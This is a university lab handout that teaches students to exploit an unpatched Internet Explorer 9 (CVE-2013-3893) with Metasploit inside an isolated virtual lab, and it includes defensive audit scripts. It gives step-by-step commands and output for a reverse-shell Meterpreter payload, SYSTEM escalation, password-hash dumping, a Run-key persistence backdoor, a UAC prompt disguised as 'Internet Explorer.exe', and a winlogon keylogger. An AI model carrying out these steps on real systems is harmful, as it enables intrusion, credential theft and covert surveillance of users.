
Lab E4: Exploiting a Windows 7 Machine

TTM4175

November 19, 2014

In this lab you will be exploiting a vulnerable Windows 7 machine by serving it some
carefully crafted malware when it visits a malicious website. Having taken complete
control over the machine, you will install a keylogger on the machine which will capture
all the keystrokes of the user on the machine.

1 Configuring a virtual network


In this lab your Kali machine will run on the same local area network (LAN) as the
vulnerable Windows machine. If you have not already configured your VirtualBox to
function as a DHCP server, go back to Lab E1 and follow the instructions there in order
to set it up. Make sure that the network mode of both your Kali and Windows machine
is set to “Host-only” networking: go to “Settings → Network” and select “Host-only
Adapter” from the drop-down menu (Figure 1).
Furthermore, ensure that the Windows 7 hard drive is detached from your Kali
machine (“Settings → Storage”).

Figure 1: Changing the network mode of your Kali VM into Internal Network.

Now boot up both machines in VirtualBox and log in as user ttm4175 on the Windows
machine. After you have logged in at both machines we need to check that they are both
on the same local network (LAN). In Kali Linux run ifconfig to see your assigned IP-
address from the DHCP server:
# ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:ae:70:e6
inet addr:10.0.0.102 Bcast:10.0.0.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:feae:70e6/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:7 errors:0 dropped:0 overruns:0 frame:0
TX packets:38 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2700 (2.6 KiB) TX bytes:3792 (3.7 KiB)

If VirtualBox was configured correctly it should have been assigned an IP-address
similar to 10.0.0.1XX. To check the IP-address on the Windows machine open up the
command line (click “Start” then type cmd and hit Enter) and run ipconfig:
C:\Users\ttm4175> ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::58cf:7cc9:2e25:bb00%11
IPv4 Address. . . . . . . . . . . : 10.0.0.101
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :

Again, the network address should read something like 10.0.0.1XX.

2 Metasploit
To exploit the vulnerable Windows machine, you will be using a tool called Metasploit.
Metasploit is a very popular penetration testing framework that comes preloaded with
hundreds of exploits for known software vulnerabilities found in a large range of systems.
The framework is commonly used to launch exploits against a vulnerable target, but it
is also a powerful development platform for creating new exploits. Metasploit has both
a command line interface and a graphical user interface. We will only be using the
command line interface in this lab. A lot of additional material on how to use Metasploit can
be found at http://www.offensive-security.com/metasploit-unleashed. Some of
the material in this lab is also taken from this site.
Start Metasploit by running msfconsole, and after a little while you should be
greeted by a nice ASCII welcome logo:
# msfconsole

____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *

Validate lots of vulnerabilities to demonstrate exposure
with Metasploit Pro -- Learn more on http://rapid7.com/metasploit

=[ metasploit v4.10.0-2014082003 [core:4.10.0.pre.2014082003 api:1.0.0]]
+ -- --=[ 1331 exploits - 722 auxiliary - 214 post ]
+ -- --=[ 340 payloads - 35 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >

You are now in the Metasploit command console from which you can run a lot of
different commands. At any point you can type help or ? to get a long list of all
available commands:
msf > help

Core Commands
=============

Command Description
------- -----------
? Help menu
back Move back from the current context
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
edit Edit the current module with $VISUAL or $EDITOR
exit Exit the console
...

The console functions very much like the normal Linux terminal: you can navigate
around with cd, list the contents of a folder with ls, select the previously ran commands
by “arrowing up” etc. Additionally, you also have access to all the special programs the
are bundled inside Metasploit.

2.1 Hacking Windows


Central to the Metasploit framework is its database of exploits for known software
vulnerabilities. We are going to use one of these exploits against our Windows 7 victim. In
particular, the Windows 7 machine runs an unpatched version of Internet Explorer 9
together with Office 2010, which contains a vulnerability that we are going to exploit.

Specifically, the vulnerability is assigned the CVE [1] identifier CVE-2013-3893 and at
the time it affected all versions of Internet Explorer from 6 to 11 on Windows 7 systems
(it has long since been patched by Microsoft, so you are unlikely to encounter this
vulnerability “in the wild”).
There are two parts to a successful hack: (1) an exploit and (2) a payload. The exploit
is the input the attacker sends to the victim machine in order to take advantage of a
vulnerability in the target code. Once the exploit has run it gives the attacker control
over the vulnerable process on the compromised machine and allows him to inject and
run the payload. The payload is simply the code that the attacker wants to run on the
victim machine. Typically it is a shell (a command line window) that connects back to
the attacker’s computer so that he can control the victim remotely. This will also be our
goal.
Metasploit’s exploits and payloads are organized as modules located in the
folder /usr/share/metasploit-framework/modules, with one for each target platform.
When you are inside the msfconsole you can access these modules directly using
special commands. To use an exploit we first have to find its name in Metasploit. To
do this we use the search utility to search for the CVE identifier mentioned above:
msf > search cve-2013-3893
Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
.../ie_setmousecapture_uaf 2013-09-17 normal MS13-080 Microsoft Internet
Explorer Use-After-Free
...

The name Metasploit has given to this exploit is “ie_setmousecapture_uaf” and
can be found in the exploit/windows/browser module. Now we tell Metasploit to use
this exploit (remember to use TAB!):
msf> use exploit/windows/browser/ie_setmousecapture_uaf

The command prompt changes to msf exploit(ie_setmousecapture_uaf) > to
indicate that this exploit has now been loaded into our current scope or context. Many
of the Metasploit commands are context dependent. For example the info command lists
useful information about a loaded exploit [2].
msf exploit(ie_setmousecapture_uaf) > info

The most interesting part of what info printed is the information on how to run
the exploit! In particular, it tells us which parameters need to be set before launching
it. To strip out everything but this information, use the show options command:
[1] CVE stands for Common Vulnerabilities and Exposures and is a dictionary of publicly known
information security vulnerabilities and exposures. It is maintained by the non-profit organization Mitre
Corporation and receives funding from the National Cyber Security Division of the U.S. Department of
Homeland Security.
[2] If you ever want to remove an exploit from the scope simply type back.

msf ... > show options
Module options (exploit/windows/browser/ie_setmousecapture_uaf):

Name Current Setting Required Description
---- --------------- -------- -----------
Retries true no Allow the browser to retry the module
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an
address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is
randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used
(accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is
random)

This table shows which parameters are required to be set before launching the exploit
and which are optional. The ie_setmousecapture_uaf exploit works by serving a web
page containing malicious content to a visiting victim, i.e., the attacker functions as a small
web server. Thus we need to provide the exploit with both the address and listening port
that the attacker’s machine will use to serve the exploit. This is recorded in the variables
SRVHOST and SRVPORT (server host and server port respectively). The address should be
the IP address of your Kali virtual machine and the port number can be 80 in order to
simulate a typical web server. For the rest of this lab description we will assume that the
Kali machine is assigned IP address 10.0.0.101 and the Windows machine 10.0.0.102.
msf ... > set srvhost <IP address of your Kali machine>
msf ... > set srvport 80

Additionally, we can (optionally) set the URL path to a very tempting link which
will lure people to our malicious web page. For example, if we set URIPATH to the value
cute_kittens.html, then anyone who visits 10.0.0.101/cute_kittens.html in search
of pictures of cute kittens will be served your exploit.
msf ... > set uripath cute_kittens.html

Run show options again to verify that your chosen values have been set:
msf ... > show options
Module options (exploit/windows/browser/ie_setmousecapture_uaf):

Name Current Setting Required Description
---- --------------- -------- -----------
Retries true no Allow the browser to retry the module
SRVHOST 10.0.0.101 yes The local host to listen on...
SRVPORT 80 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate...
SSLVersion SSL3 no Specify the version of SSL that...
URIPATH cute_kittens.html no The URI to use for this exploit...

Next it is time to set the payload. As said previously, the payload is typically a
terminal shell that connects back to the attacker’s machine to give him remote access
(also known as a reverse shell). While that is really useful, Metasploit offers us something
even better: Meterpreter.
The Metasploit Meterpreter is a command interpreter payload that is injected into
the memory of the exploited process and provides extensive and extendable features to
the attacker. It of course gives you a normal terminal to work with, but it also adds all
sorts of useful small programs that you can run on the victim’s machine. Additionally,
this payload never actually hits the disk on the victim machine; everything is injected
into the process memory with no additional process created. It also provides a consistent
feature set no matter which platform is being exploited.
Set the payload with the set payload command:
msf ... > set payload windows/meterpreter/reverse_tcp
msf ... > show options

You also have to provide the payload with the listening address and port number of
the machine that it will contact back to. This could be any computer that the attacker
has set up to listen for incoming connections and that he will use to control the victim
machine. In this lab we will use the same Kali machine both to host the malicious
website and to work as the command center which the payload connects back to. But
in principle these could be two completely different machines. Set the IP address
to the same one as before and just leave the port number at the default (4444):
msf ... > set lhost 10.0.0.101
msf ... > show options

Running the exploit. Now that everything is set up you can run your exploit!
msf ... > run
[*] Exploit running as background job.

[*] Started reverse handler on 10.0.0.101:4444


[*] Using URL: http://10.0.0.101:80/cute_kittens.html
[*] Server started.

Your malicious web server now runs at port 80, waiting for incoming requests to the
cute_kittens.html web page. You can check that the service has started by typing
jobs into the msfconsole. This will display all the jobs that you have started in this
session.
msf ... > jobs

Jobs
====

Id Name
-- ----
0 Exploit: windows/browser/ie_setmousecapture_uaf

Getting infected. Now it is time to get a victim infected. On your Windows 7
machine open up Internet Explorer in administrator mode (Figure 2). Click “Yes” when
prompted for whether you would allow this program to make changes to this computer
or not. When Internet Explorer has started type 10.0.0.101/cute_kittens.html into
the address bar and hit Enter.

Figure 2: Running Internet Explorer 9 as administrator.

What happens next can vary a bit: either nothing happens or Internet Explorer
crashes. Either way, just wait a couple of seconds and then close the browser. If you now
open up your Kali machine you should see something similar to the following in the
Metasploit console:
[*] 10.0.0.102 ie_setmousecapture_uaf - Gathering target information.
[*] 10.0.0.102 ie_setmousecapture_uaf - Sending response HTML.
[*] Sending stage (769536 bytes) to 10.0.0.102
[*] Meterpreter session 1 opened (10.0.0.101:4444 -> 10.0.0.102:49158) at 2014-08-22...
[*] Session ID 1 (10.0.0.101:4444 -> 10.0.0.102:49158) processing InitialAutoRunScript...
[*] Current server process: rundll32.exe (1400)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 880
[+] Successfully migrated to process

If you got the above: congratulations! – you have now hacked a Windows 7 computer!
The exploit spawned and migrated to a different process (which one? see Question 1)
on the compromised machine, containing the Meterpreter session which connects back
to the attacker’s machine. If you did not get the above just try again and make sure to
leave Internet Explorer open a few seconds after you have visited the page.
After you have successfully served the exploit, type sessions into the Metasploit
console and you will see all the sessions that are available to you:
msf ... > sessions

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 ttm4175-PC\ttm4175 @ TTM4175-PC 10.0.0.101:4444 -> 10.0.0.102:49158 (10.0.0.102)

To control the Windows machine remotely from Kali jump into the available Meterpreter
session:
msf ... > sessions -i 1
meterpreter >

You are now “logged in” on the Windows machine. Run getuid to get the username
of the user that you are logged in as:
meterpreter > getuid
Server username: ttm4175-PC\ttm4175

Type help to get a list of all the options and programs you have available. For
example, to take a screenshot of the currently logged in user’s screen use the screenshot
tool (to make the picture more interesting make sure to have some windows open on
your Windows machine).
meterpreter > screenshot
Screenshot saved to: /root/ltblllwNK.jpeg % the picture name is random

If you now open up your home folder on the Kali machine you will find a picture
named ltblllwNK.jpeg containing the contents of the victim’s desktop. Try out some
other commands.
While the ttm4175 user has administrator rights on this computer, to get access to
everything on the Windows computer we need to switch to the SYSTEM user. This is
easy as long as our exploit was run with administrator privileges: just type getsystem:
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Now we have full control over this PC and can do whatever we like. For example, we
can get the contents of the SAM database that you looked at in the previous labs using
the hashdump tool.
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Lab 3 - DO NOT WIPE!:1002:aad3b435b51404eeaad3b435b51404ee:cfa8aca94b1cd232a504e71604bf690c:::
Lab1:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Lab4:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ttm4175:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
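As an added example (not part of the lab), the Python script below parses hashdump output in the pwdump layout shown above and flags what a defender would look for first: accounts with no password at all, and accounts that still store a real LM hash. It relies only on the fixed LM and NT hashes of the empty password; the sample input is the dump above plus one constructed line (Lab5, placeholder hashes) so that the LM check has something to find.

```python
# Added example, not from the lab: audit hashdump (pwdump format) output.
# Layout of each line:  user:RID:LM hash:NT hash:::
#
# The LM and NT hashes of the empty password are fixed values, so an account
# can be audited without cracking anything:
#   NT hash == EMPTY_NT  -> the account has no password set
#   LM hash != EMPTY_LM  -> a real (trivially crackable) LM hash is still stored,
#                          i.e. LM hashing is not disabled for this account
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of the empty string
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty string

WELL_KNOWN_RIDS = {500: "built-in Administrator", 501: "built-in Guest"}

# Sample input: the six lines from the lab's hashdump, plus one constructed
# line ("Lab5", placeholder hashes) showing what a stored LM hash looks like.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Lab 3 - DO NOT WIPE!:1002:aad3b435b51404eeaad3b435b51404ee:cfa8aca94b1cd232a504e71604bf690c:::
Lab1:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Lab4:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ttm4175:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Lab5:1004:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
"""


def parse_hashdump(text):
    """Return (user, rid, lm, nt) tuples; lines that do not fit the layout are skipped."""
    accounts = []
    for line in text.splitlines():
        fields = line.strip().split(":")
        # A valid line has at least user, RID, LM, NT; the RID must be numeric.
        if len(fields) < 4 or not fields[1].isdigit():
            continue
        user, rid, lm, nt = fields[0], int(fields[1]), fields[2].lower(), fields[3].lower()
        if len(lm) != 32 or len(nt) != 32:
            continue
        accounts.append((user, rid, lm, nt))
    return accounts


def audit_hashdump(text):
    """Return (user, finding) pairs in the order the accounts appear in the dump."""
    findings = []
    for user, rid, lm, nt in parse_hashdump(text):
        if nt == EMPTY_NT:
            findings.append((user, "empty password"))
        if lm != EMPTY_LM:
            findings.append((user, "LM hash stored"))
    return findings


def report(text):
    """Human-readable summary, one line per finding, tagging well-known RIDs."""
    rids = {user: rid for user, rid, _, _ in parse_hashdump(text)}
    lines = []
    for user, finding in audit_hashdump(text):
        tag = WELL_KNOWN_RIDS.get(rids[user])
        suffix = f" [{tag}]" if tag else ""
        lines.append(f"{user:<22} RID {rids[user]:<5} {finding}{suffix}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(SAMPLE_HASHDUMP))
```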

To jump out of a Meterpreter session and back to the Metasploit console type
background and the Meterpreter session will be sent to the background. You
can resume it at any time by running sessions -i <session ID> again.

Note: The Metasploit job serving the malicious web page is still running in the
background. Any time someone with a vulnerable Internet Explorer visits your web page,
a new Meterpreter session is spawned and added to the list of available Meterpreter
sessions.

2.2 Maintaining presence


While you have now established a first foothold on the victim’s machine it is still quite
fragile. Particularly, if the user were to turn off his machine or kill the process that hosts
the shell, your Meterpreter session would be lost. Thus, after going through all the hard
work of exploiting a system, it is often a good idea to leave yourself an easier way back
into the system later. This way, if the service you exploited is down or patched, you can
still gain access to the system. Metasploit has a Meterpreter script that will create a
Meterpreter service that will be available to you even if the remote system is rebooted.
One word of warning here before we go any further. The persistent Meterpreter
session that we will use requires no authentication. This means that anyone who gains
access to the port could access your back door! This is not a good thing if you are
conducting a penetration test, as this could be a significant risk. In a real world situation
as a penetration tester one would have to be very careful to clean up after oneself,
lest you leave behind a massive security hole in the same system that you are trying to secure!

2.2.1 Installing the backdoor


Once we have initially exploited the host, we run the persistence script with the -h
switch to see which options are available:
meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

-A Automatically start a matching multi/handler to connect to the agent
-L <opt> Location in target host where to write payload to, if none %TEMP% will be used.
-P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt> Alternate executable template to use
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i <opt> The interval in seconds between each connection attempt
-p <opt> The port on the remote host where Metasploit is listening
-r <opt> The IP of the system running Metasploit listening for the connect back

This program will make the victim machine “phone home” to the command and
control center every i seconds, allowing the attacker to regain control over the machine.
With the -U flag we can also set up the program to automatically start once a
user logs on. We will configure our persistent Meterpreter session to wait until a user
logs on to the remote system and then try to connect back to our listener every 5 seconds at
IP address 10.0.0.101 on port 443.

meterpreter > run persistence -U -i 5 -p 443 -r 10.0.0.101
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/.../TTM4175-PC_20141113.0315.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=10.0.0.102 LPORT=443
[*] Persistent agent script is 148446 bytes long
[+] Persistent Script written to C:\Users\ttm4175\AppData\Local\Temp\REWLBssemE.vbs
[*] Executing script C:\Users\ttm4175\AppData\Local\Temp\REWLBssemE.vbs
[+] Agent executed with PID 3968
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\LPLuHjdcUvA
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\LPLuHjdcUvA

Notice that the script also wrote a file TTM4175-PC_20141113.0315.rc describing
the commands that need to be run in order to clean up the persistent listener after you
are done with it. As noted above it is crucial that one doesn’t leave an unauthenticated
backdoor on the system! Refer to Section 2.2.3 when you want to clean up after yourself.

2.2.2 Using the backdoor


To verify that the backdoor works as intended, first log out of your Windows 7 machine.
Soon you will see that you lose your Meterpreter session.
meterpreter >
[*] Meterpreter session 1 closed. Reason: Died
msf exploit(ie_setmousecapture_uaf) >

However, the persistent agent that we planted is still active and will trigger as soon as
a user logs into the computer again. Now we just have to set up a payload handler on
the Kali machine that picks up the outgoing connections coming from the Windows
machine. As usual we will set this handler to also create a Meterpreter shell:
msf exploit(ie_setmousecapture_uaf) > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.0.0.101
msf exploit(handler) > set LPORT 443
msf exploit(handler) > run
[*] Started reverse handler on 10.0.0.101:443
[*] Starting the payload handler...

Now the payload handler is activated. Log in as ttm4175 again and a Meterpreter
session will be opened up for you.
[*] Sending stage (769536 bytes) to 10.0.0.101
[*] Meterpreter session 3 opened (10.0.0.102:443 -> 10.0.0.101:49157) at 2014-11-13 18:05:16 +0100
meterpreter >

You have now regained control over the machine.

2.2.3 Cleaning up after yourself


To clean up your backdoor you have to follow the directions that the persistence script
left behind in the /root/.msf4/logs/persistence folder when it was run. In a new
terminal window on Kali Linux go to this folder:

# cd /root/.msf4/logs/persistence/
# ls
TTM4175-PC_20141114.0559 TTM4175-PC_20141114.1956 TTM4175-PC_20141114.4702
TTM4175-PC_20141114.0856 TTM4175-PC_20141114.4031

The contents of this folder are more folders, one for each time you installed the
persistence backdoor. In each folder X there is a file called X.rc containing the
commands you need to run in order to remove the backdoor. For example the contents of
TTM4175-PC_20141114.4702/TTM4175-PC_20141114.4702.rc is the following:
# cat TTM4175-PC_20141114.4702/TTM4175-PC_20141114.4702.rc
rm C:\Windows\TEMP\UxsKhOmVGnTRE.vbs
kill 3028
reg deleteval -k 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' -v WCAszyAHzV

If you are not already logged into a Meterpreter session, jump into it with sessions
-i <SESSION ID> inside the msfconsole (if you have lost all your Meterpreter sessions
repeat the steps in Section 2.2.2 in order to get back your access first).
Now you need to run all these commands from within the Meterpreter session.
meterpreter > rm C:\Windows\TEMP\UxsKhOmVGnTRE.vbs
meterpreter > kill 3028
meterpreter > reg deleteval -k 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' -v WCAszyAHzV

Note that some of these commands may fail, but just ignore that. Repeat the above
steps for every folder X in /root/.msf4/logs/persistence: (1) first run cat X/X.rc
to see which commands you should run; then (2) execute them inside a Meterpreter
session as above.
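As an added example (not part of the lab), the Python below does two things around the persistence artifacts discussed in this section: it parses the X.rc cleanup files that run persistence leaves in /root/.msf4/logs/persistence (the rm / kill / reg deleteval lines shown above) into a checklist of what must be gone from the victim, and it scans a reg query listing of the HKCU Run key for the tell-tale shape of this backdoor, a script file under a Temp folder. The registry listing is a constructed sample built around the value name and .vbs path printed by the persistence run in Section 2.2.1.

```python
# Added example, not from the lab: account for Metasploit persistence artifacts.
import re
from pathlib import Path

# Sample cleanup file, as written by `run persistence` (contents from the lab).
SAMPLE_RC = r"""
rm C:\Windows\TEMP\UxsKhOmVGnTRE.vbs
kill 3028
reg deleteval -k 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' -v WCAszyAHzV
"""

# Constructed `reg query HKCU\...\Run` output: one benign entry plus the value
# name and .vbs path that the lab's persistence run printed.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    Updater        REG_SZ    "C:\Program Files\Example\updater.exe" /quiet
    LPLuHjdcUvA    REG_SZ    C:\Users\ttm4175\AppData\Local\Temp\REWLBssemE.vbs
"""

SCRIPT_EXTENSIONS = (".vbs", ".js", ".wsf", ".bat", ".cmd", ".ps1")
# Accept straight or typographic quotes around the key, since copied .rc text varies.
_REG_DELETEVAL = re.compile(r"reg deleteval -k ['\u2019]([^'\u2019]+)['\u2019] -v (\S+)")


def parse_cleanup_rc(text):
    """Turn the rm / kill / reg deleteval lines of an X.rc file into (type, value) records."""
    artifacts = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("rm "):
            artifacts.append(("file", line[3:].strip()))
        elif line.startswith("kill "):
            artifacts.append(("pid", int(line[5:].strip())))
        else:
            m = _REG_DELETEVAL.match(line)
            if m:
                artifacts.append(("regval", m.group(1) + "\\" + m.group(2)))
            else:
                artifacts.append(("unknown", line))  # keep it visible rather than drop it
    return artifacts


def collect_cleanup_dir(log_dir="/root/.msf4/logs/persistence"):
    """Map every install folder X under log_dir to the artifacts listed in X/X.rc."""
    return {rc.parent.name: parse_cleanup_rc(rc.read_text())
            for rc in sorted(Path(log_dir).glob("*/*.rc"))}


def find_temp_script_autoruns(reg_query_output):
    """Return (value name, data) for Run entries whose data is a script under a Temp folder."""
    hits = []
    for line in reg_query_output.splitlines():
        parts = line.split(None, 2)  # name, type, data
        if len(parts) != 3 or not parts[1].startswith("REG_"):
            continue
        name, _, data = parts
        target = data.strip().strip('"').lower()
        if "\\temp\\" in target and target.endswith(SCRIPT_EXTENSIONS):
            hits.append((name, data.strip()))
    return hits


if __name__ == "__main__":
    for kind, value in parse_cleanup_rc(SAMPLE_RC):
        print(f"remove {kind:<7} {value}")
    for name, data in find_temp_script_autoruns(SAMPLE_REG_QUERY):
        print(f"suspicious Run value {name} -> {data}")
```

On a Kali box with real cleanup logs, collect_cleanup_dir() gives one checklist per install folder, which is the "every folder X" loop above done in one pass.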

2.3 Elevate access to administrator privileges


When you got the Meterpreter session back in the previous section you were logged
in as ttm4175 (check with getuid!). However, notice that you can no longer obtain
SYSTEM privileges (why? see Question 2).
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied.

This means that you will not be able to fully control the computer. This is often
the situation in real life attacks – in Section 2.1 we somewhat artificially elevated our
privileges before running Internet Explorer. Typically, the first thing an attacker will
try to do once he has gotten access to a system is to elevate his privileges. Often the
attacker will try to exploit some program locally on the computer in order to get SYSTEM
access. However, we will do something much simpler: we will simply ask!
First background your current session:
meterpreter > background
msf exploit(handler) >

Now we will upload a file to the victim’s machine and simply ask him to run this
with administrator privileges.

msf ... > use exploit/windows/local/ask % the malicious file
msf ... > set session 2 % the available session ID
% run "sessions" to verify
msf ... > set payload windows/meterpreter/reverse_tcp % same payload as always
msf ... > set lhost 10.0.0.101
msf ... > set lport 4443 % notice the port number!
msf ... > show options

If you run this exploit, a UAC prompt will appear on the Windows 7 machine asking
the user whether they would like to run the program or not (Figure 3a).

(a) Random file name. (b) Fake file name.

Figure 3: The Windows UAC prompt.

As you can see from Figure 3a Meterpreter has chosen the rather random looking
filename YrKhVlqbqWiYT.exe. While many people will just blindly click “Yes” without
reading the text, some users might get a bit skeptical when seeing such a strangely
named program. However, if you read the output from the show options command
above, you’ll notice that it takes an (optional) argument called filename. If we set this
variable to something more innocent sounding, hopefully more people will be willing to
click yes in the UAC prompt.
msf ... > set filename 'Internet Explorer.exe' % use straight quotes in the terminal
msf ... > run

The UAC prompt in Figure 3b will probably trick more users into clicking yes. If you
click “Yes” a new Meterpreter session is started. And behold! If you now run getsystem
you’ll notice that we have obtained SYSTEM access.
meterpreter > getsystem
...got system (via technique 1).

2.4 Installing a keylogger


A keylogger is a program that logs every keystroke that the user makes on a machine.
Meterpreter comes preloaded with a keylogger utility called keyscan. Start it by running
keyscan_start. Then, on the Windows machine, have one group member create a
document and write some lines without letting the other group member know about
it. Once finished, run keyscan_dump in the Meterpreter session on the Kali machine in
order to obtain what the other member typed in. Try the experiment again, but this
time using the On-Screen Keyboard [3]. What do you observe?
The keylogger can also be used to collect the login information of all the accounts on
the computer. All we have to do is migrate to the WinLogon process and then run
keyscan_start again. Then all keys entered into the Windows logon screen are captured
(in the clear!) and ready to be collected. First we need to make sure our Meterpreter session is
running with the privileges of the SYSTEM user on the Windows machine. We achieve
this by running:
meterpreter > getsystem
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

The output above shows that our session has the highest privileges on the machine.
Now we need to find the process ID of the WinLogon process. This is done by typing ps,
which will show you all running processes on the machine just like Task Manager in
Windows.
meterpreter > ps
Process List
============

PID PPID Name Arch Session User
--- ---- ---- ---- ------- ----
0 0 [System Process] 4294967295
4 0 System 4294967295
100 480 taskhost.exe x86 1 ttm4175-PC\ttm4175
184 448 taskmgr.exe x86 1
268 4 smss.exe 4294967295
344 336 csrss.exe 4294967295
380 336 wininit.exe 4294967295
392 372 csrss.exe 4294967295
432 372 winlogon.exe 4294967295
...

From the above we see that the WinLogon process (winlogon.exe) has PID 432.
Now migrate to this process using migrate:
meterpreter > migrate 432
[*] Migrating from 880 to 432...
[*] Migration completed successfully.

Having migrated to the WinLogon process, start the keylogger again. Then on your
Windows machine simulate a logon by locking the screen (“Start → click the little arrow
next to “Shut down” then select “Lock””). Log in again, then run keyscan_dump in
Meterpreter. You now have the administrator’s password to the machine!
There is another tool called dumplinks that lists (and optionally downloads) all the
recently used documents on a Windows system. This can often contain a lot of interesting
information about the target. Read more about it by running run dumplinks -h.
[3] This assumes that you remembered to reset the osk.exe binary from Lab E2! If you did not, just
go into the folder C:\Windows\System32 on your Windows machine. First verify that the backup file
you created in Lab E2 (osk.exe.backup) is still there. If it is, delete the file osk.exe then rename
osk.exe.backup to osk.exe. Done!

Questions
Q1. What is the purpose of migrating to a different process after an exploit? Which
process did Meterpreter migrate to when you ran the exploit in Section 2.1?

Hint: Open up Task Manager on your Windows machine!

Q2. In Section 2.3 you logged in as user ttm4175 who has administrator rights on the
computer. Why then, did you not get full access when he logged in and got exploited?

Q3. Even if you have already taken over a computer with a remote exploit, why can it
still be useful to dump the SAM database?

Q4. In Section 2.2 you created a backdoor by having the victim machine “phone home”
every i seconds. Give another example of how to create a backdoor. Compare the
advantages/disadvantages of the two methods.

Hint: Check out the Meterpreter tool metsvc.

Q5. Sometimes your payload might be detected by anti-virus software on the
compromised machine, preventing your code from running. How can we deal with this?
Does Metasploit have any support for this?

Q6. Facebook and many other websites employ encryption when delivering their web
pages in order to protect their users from eavesdropping. If a user accessed Facebook
with a keylogger installed, would encryption help him? Why? Why not?

Q7*. (This is a difficult question and is optional). Explain what a buffer overflow is.

Q8**. (This is a very difficult question and is optional). Explain the CVE-2013-3893
vulnerability (also known as MS13-080) which you exploited in this lab.

